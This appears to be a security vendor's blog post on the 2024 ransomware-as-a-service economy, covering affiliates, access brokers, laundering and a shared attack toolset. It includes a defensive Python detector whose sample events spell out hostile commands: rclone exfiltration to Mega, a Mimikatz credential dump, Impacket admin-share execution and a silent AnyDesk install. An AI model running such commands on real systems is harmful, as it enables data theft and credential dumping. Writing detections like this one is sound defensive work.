By September 2024, the ransomware-as-a-service ecosystem had survived more law enforcement pressure than at any prior point in its history. The FBI disrupted BlackCat/ALPHV in December 2023. Operation Cronos took down LockBit's infrastructure in February 2024. Multiple arrests targeted Scattered Spider operatives. Russian authorities detained alleged REvil members in January 2022.
And yet, ransomware attacks in 2024 were on pace to match or exceed 2023 levels. The RaaS ecosystem had not just survived — it had adapted, decentralized, and in many ways grown stronger. Understanding why requires examining the ecosystem not as a collection of individual groups but as an interconnected economy with its own labor market, supply chain, and competitive dynamics.
The RaaS Business Model
At its core, RaaS is a franchise model. The operators (sometimes called "admins" or "developers") build and maintain the ransomware technology stack:
- The ransomware payload
- Encryption key management infrastructure
- Victim negotiation portals
- Leak sites for stolen data
- Payment processing (cryptocurrency wallets and laundering)
Affiliates operate as independent contractors who:
- Gain initial access to victim networks (through phishing, vulnerability exploitation, or purchased access)
- Conduct post-exploitation activities (lateral movement, privilege escalation, data theft)
- Deploy the ransomware payload
- Sometimes handle victim negotiations
Revenue is split between operators and affiliates, typically 20-30% to operators and 70-80% to affiliates, though competitive pressures pushed affiliate shares higher in 2024.
The 2024 Landscape
Post-LockBit Fragmentation
LockBit's disruption by Operation Cronos created a power vacuum that was filled not by one successor but by many:
RansomHub: Emerged in early 2024 and quickly became one of the most active operations, reportedly absorbing former LockBit and BlackCat affiliates. By mid-2024, RansomHub was listing more victims than any single competitor.
Qilin (Agenda): Expanded operations significantly in 2024, targeting healthcare organizations and critical infrastructure with both Windows and Linux variants.
Hunters International: Positioned itself as a data extortion operation (emphasizing theft over encryption), carrying forward code from the Hive ransomware operation that the FBI disrupted in January 2023.
Medusa: Increased activity through 2024, with a focus on education and healthcare sectors.
INC Ransom: Gained attention for attacks on healthcare organizations and government agencies.
The proliferation of groups meant that affiliates had more choices than ever, and could switch between operations based on reliability, payout terms, and technical capabilities.
The Affiliate Labor Market
By 2024, experienced affiliates operated in a seller's market. Skilled affiliates with proven track records could negotiate favorable terms from multiple RaaS platforms:
- Higher revenue shares (up to 90% for top performers)
- Priority access to new payload versions and features
- Exclusive targeting territories or sectors
- Support for complex operations including supply chain attacks
This competitive dynamic meant that disrupting a single RaaS brand had limited impact — affiliates simply migrated to alternatives, taking their skills, access, and victim pipelines with them.
Initial Access Brokerage
The initial access broker (IAB) market continued to mature as a distinct layer of the ecosystem:
- IABs specialized in gaining and selling network access, operating independently from ransomware groups
- Access to organizations was sold through underground forums and private channels
- Pricing ranged from hundreds of dollars for small businesses to tens of thousands for large enterprises
- VPN access, RDP access, and web shell access were the most common offerings
This specialization created a supply chain within the criminal ecosystem itself — IABs as suppliers, affiliates as operators, and RaaS platforms as infrastructure providers.
Cryptocurrency Laundering Evolution
Payment processing adapted to increased law enforcement pressure:
- Greater use of privacy-focused cryptocurrencies (Monero) alongside Bitcoin
- Chain-hopping — converting between cryptocurrencies to obscure transaction trails
- Decentralized exchanges and DeFi protocols used for laundering
- Mixers and tumblers, despite sanctions and prosecutions aimed at services like Tornado Cash
- Peer-to-peer exchanges to convert cryptocurrency to fiat currency
The Treasury Department's sanctions against cryptocurrency addresses associated with ransomware groups created compliance challenges but didn't significantly reduce payment flows.
Supply Chain Implications
The RaaS ecosystem in 2024 had significant supply chain dimensions:
The Ransomware Supply Chain
The ecosystem itself functioned as a supply chain:
- Vulnerability researchers discovered and sold exploits
- Initial access brokers gained and sold network access
- RaaS operators provided the technology platform
- Affiliates conducted operations and deployed payloads
- Cryptocurrency launderers processed payments
- Bulletproof hosters provided infrastructure
Each layer specialized and traded with adjacent layers, creating resilience — disrupting one layer didn't collapse the chain because the other layers continued operating.
Victim Supply Chain Targeting
Multiple RaaS affiliates converged on supply chain targeting as the strategy with the best return per intrusion:
- MSP compromises for mass victim access
- Software vendor targeting for downstream impact
- File transfer tool exploitation (following Clop's mass exploitation of managed file transfer products such as MOVEit Transfer in 2023)
- IT management platform abuse for lateral deployment
The convergence was logical — supply chain attacks maximized the number of victims per intrusion, and the RaaS model's affiliate payouts incentivized efficiency.
Shared Tool Supply Chain
RaaS operators and affiliates relied on a shared set of legitimate and semi-legitimate tools:
- Cobalt Strike: Despite licensing controls, cracked and pirated versions remained widely available, and Beacon stayed the most common post-exploitation implant
- Mimikatz and its forks: Open-source tools for dumping credentials from LSASS memory and abusing them (pass-the-hash, Kerberos ticket forgery)
- Impacket: Python library for Windows network protocols (SMB, MSRPC, Kerberos) whose example scripts (psexec.py, wmiexec.py, secretsdump.py) are used for lateral movement and credential dumping
- RMM tools: Legitimate remote monitoring and management agents (AnyDesk, ScreenConnect, Atera and others) installed for persistence and hands-on-keyboard access
- Rclone and similar: Legitimate sync clients pointed at attacker-controlled cloud storage (Mega was a frequent destination) to exfiltrate data before encryption
This shared toolset created detection opportunities: the tools' command lines, default configurations, and parent-child process relationships are well documented. But it also meant that defenders had to distinguish malicious from legitimate use of the same binaries, so effective detections keyed on how a tool was invoked and where it connected rather than on its file name.
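As an added example (not code from the article or from any of the tools it names), the following Python detector applies the kind of behavioural rules the passage calls for to process-creation events. The event field names (host, user, image, command_line) are assumed EDR/Sysmon-style names, the RMM allowlist is hypothetical, and every sample event is constructed for the demonstration. The rules cover renamed rclone (by its flags rather than its name), Mimikatz module syntax, Impacket's loopback admin-share output redirection, unapproved RMM agents, and Cobalt Strike's default argument-less rundll32.exe sacrificial process.

```python
"""Behavioural detections for the shared ransomware toolset.

Added example, not the article's code. Each rule keys on how a tool is
invoked rather than on its file name, because affiliates rename rclone,
Mimikatz and Cobalt Strike loaders but rarely change their arguments.
Field names are assumed EDR/Sysmon-style names; all events are constructed.
"""
import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Hypothetical allowlist: the one RMM product this organisation sanctions.
APPROVED_RMM = {"screenconnect.clientservice.exe"}
# Legitimate remote-management agents affiliates install for persistence.
RMM_BINARIES = {"anydesk.exe", "teamviewer.exe", "ateraagent.exe",
                "screenconnect.clientservice.exe"}
# rclone-specific flags; they survive renaming of the executable.
RCLONE_FLAGS = ("--transfers", "--config", "--no-check-certificate",
                "--multi-thread-streams", "--ignore-existing")

# rclone subcommand followed by a source and a "<remote>:<path>" target.
RCLONE_RE = re.compile(r"\b(copy|sync|move)\b\s+\S+\s+(?P<remote>[\w-]+):\S*", re.I)
# Mimikatz module::command syntax; forks usually keep the grammar.
MIMIKATZ_RE = re.compile(r"\b(sekurlsa|lsadump|privilege|kerberos|token)::\w+", re.I)
# Impacket wmiexec.py / smbexec.py redirect command output to a "__"-prefixed
# temporary file on the loopback admin share.
IMPACKET_RE = re.compile(r"\\\\127\.0\.0\.1\\(ADMIN|C)\$\\__", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    user: str
    command_line: str


def evaluate(event: dict) -> list[Finding]:
    """Apply every rule to one process-creation event; return its findings."""
    image = PureWindowsPath(event["image"]).name.lower()
    cmd = event["command_line"]
    rules: list[str] = []

    # A built-in `copy src D:\dst` also matches RCLONE_RE, so require either
    # the rclone binary name or rclone-only flags before flagging.
    m = RCLONE_RE.search(cmd)
    if m and (image.startswith("rclone") or any(f in cmd for f in RCLONE_FLAGS)):
        rules.append(f"rclone_exfiltration:{m['remote'].lower()}")
    if MIMIKATZ_RE.search(cmd):
        rules.append("mimikatz_module_syntax")
    if IMPACKET_RE.search(cmd):
        rules.append("impacket_loopback_admin_share")
    if image in RMM_BINARIES and image not in APPROVED_RMM:
        rules.append(f"unapproved_rmm:{image}")
    # rundll32.exe with no arguments is Cobalt Strike's default sacrificial
    # process for post-exploitation jobs; legitimate callers pass a DLL.
    # Quoted paths count as one token so "C:\Program Files\..." is not split.
    if image == "rundll32.exe" and len(re.findall(r'"[^"]*"|\S+', cmd)) == 1:
        rules.append("rundll32_no_arguments")
    return [Finding(r, event["host"], event["user"], cmd) for r in rules]


def scan(events: list[dict]) -> list[Finding]:
    return [f for e in events for f in evaluate(e)]


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per rule, dropping the ':' qualifier."""
    return dict(Counter(f.rule.split(":")[0] for f in findings))


# Constructed sample events: six malicious, three benign look-alikes.
SAMPLE_EVENTS = [
    {"host": "WS-042", "user": r"CORP\jdoe", "image": r"C:\ProgramData\rclone.exe",
     "command_line": r'rclone.exe copy "D:\Finance" mega:backup --transfers 32 --no-check-certificate'},
    {"host": "FS-01", "user": r"CORP\svc_backup", "image": r"C:\Windows\Temp\svchost.exe",  # renamed rclone
     "command_line": r'svchost.exe sync "\\FS-01\Shares" s3:staging --config C:\Windows\Temp\r.conf -q'},
    {"host": "WS-042", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\cmd.exe",  # benign built-in copy
     "command_line": r"cmd.exe /c copy C:\reports\q3.xlsx D:\archive"},
    {"host": "DC-01", "user": r"CORP\Administrator", "image": r"C:\Users\Public\mk.exe",
     "command_line": r'mk.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"host": "SRV-07", "user": r"CORP\itadmin", "image": r"C:\Windows\System32\cmd.exe",  # child of WmiPrvSE.exe
     "command_line": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1718031234.12 2>&1"},
    {"host": "WS-042", "user": r"CORP\jdoe", "image": r"C:\Users\jdoe\AppData\Roaming\AnyDesk\AnyDesk.exe",
     "command_line": r'"C:\Users\jdoe\AppData\Roaming\AnyDesk\AnyDesk.exe" --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent'},
    {"host": "WS-017", "user": r"CORP\helpdesk",  # approved RMM, no finding
     "image": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe",
     "command_line": r'"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe"'},
    {"host": "WS-042", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\rundll32.exe",  # parent: %TEMP%\update.exe
     "command_line": r"rundll32.exe"},
    {"host": "WS-017", "user": r"CORP\helpdesk", "image": r"C:\Windows\System32\rundll32.exe",  # benign control-panel call
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL timedate.cpl"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host:7} {f.user:18} {f.rule:34} {f.command_line}")
    print(summarize(scan(SAMPLE_EVENTS)))
```

Running the block reports six findings and leaves the three look-alikes alone: the built-in `copy` to a drive letter matches the rclone regex but carries no rclone flags, the sanctioned ScreenConnect service is on the allowlist, and the rundll32.exe call that names a DLL is a normal control-panel launch. In production the same rules would be enriched with the parent process (WmiPrvSE.exe spawning cmd.exe for the Impacket case, an unsigned binary in a temp directory for the rundll32 case) and the destination of any network connection the process makes.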
The Resilience Problem
The RaaS ecosystem's resilience in 2024 stemmed from several structural factors:
Decentralization: The separation of roles (developers, IABs, affiliates, launderers) meant that no single point of failure could collapse the ecosystem.
Low barriers to entry: New RaaS platforms could launch using leaked source code (Conti, LockBit, Babuk) as a starting point, reducing development costs and time.
Profitable economics: Even though a smaller share of victims chose to pay, ransom payments remained profitable enough to sustain the ecosystem. Total ransomware payment volume exceeded $1 billion in 2023, a record.
Safe havens: Key actors continued to operate from jurisdictions with limited law enforcement cooperation, particularly Russia and CIS countries.
Adaptability: When one technique was disrupted or defended against, the ecosystem quickly pivoted to alternatives. When Cobalt Strike detection improved, groups adopted Sliver and other C2 frameworks. When email phishing was filtered, groups moved to Microsoft Teams messaging and phone-based social engineering.
What's Needed
Addressing the RaaS ecosystem requires systemic approaches:
Disruption at scale: Not just targeting individual groups but disrupting the ecosystem's infrastructure layers — IAB marketplaces, cryptocurrency laundering services, bulletproof hosting providers.
Increasing the cost of operations: Regulation of cryptocurrency, improved international law enforcement cooperation, and persistent disruption campaigns that force groups to constantly rebuild infrastructure.
Reducing profitability: Expanding ransomware payment reporting requirements, potentially restricting payments in certain circumstances, and improving backup and recovery capabilities to reduce the need to pay.
Supply chain security: Addressing the software and service provider vulnerabilities that enable mass exploitation and supply chain cascade attacks.
How Safeguard.sh Helps
The RaaS ecosystem's focus on supply chain exploitation — from MSP targeting to file transfer tool abuse — makes software supply chain security a direct counter to the most efficient attack strategies in the ransomware playbook.
Safeguard.sh provides the comprehensive supply chain visibility that defenses against the RaaS ecosystem demand. The platform's automated SBOM management, continuous vulnerability monitoring, and policy enforcement create a systematic approach to securing the software components that ransomware affiliates target.
By mapping your complete dependency chain and monitoring it for vulnerabilities in real time, Safeguard.sh helps you close the supply chain gaps that RaaS affiliates exploit. When the ransomware ecosystem operates as a specialized supply chain of criminal services, your defense needs to be equally systematic about your own software supply chain.